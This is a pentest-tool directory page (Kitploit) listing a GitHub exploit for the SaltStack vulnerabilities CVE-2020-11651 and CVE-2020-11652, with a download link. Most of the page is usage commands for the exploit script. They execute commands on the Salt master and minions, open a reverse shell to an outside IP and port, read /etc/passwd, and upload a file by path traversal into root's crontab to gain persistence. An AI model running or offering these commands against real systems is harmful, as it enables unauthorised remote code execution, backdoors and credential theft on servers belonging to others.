Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2020-11652 — CVE-2020-11652 & CVE-2020-11651 | Kitploit
Tools/GitHubGitHub/al1ex/cve-2020-11652
Privilege EscalationVulnerability AnalysisExploitationLateral MovementPenetration TestingCommand and Control
GitHubal1ex/cve-2020-11652

CVE-2020-11652

CVE-2020-11652 & CVE-2020-11651

View Repository
635 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

SaltStack-Exp

CVE-2020-11651 CVE-2020-11652

Exec-Master:

root@kitploit:~
python exp.py --exec-choose master --exec-cmd "whoami"

Exec-Minions:

root@kitploit:~
python exp.py --exec-choose minions --exec-cmd "whoami"

GetShell:

root@kitploit:~
python exp.py --shell-LHOST 8.8.8.8 --shell-LPORT 4444

ReadFile:

root@kitploit:~
python exp.py --read /etc/passwd

UploadFile:

root@kitploit:~
python exp.py --upload-src "/test/root" --upload-dest "../../../../../../../../var/spool/cron/crontabs/root"

From :https://github.com/bravery9/SaltStack-Exp

Download Tool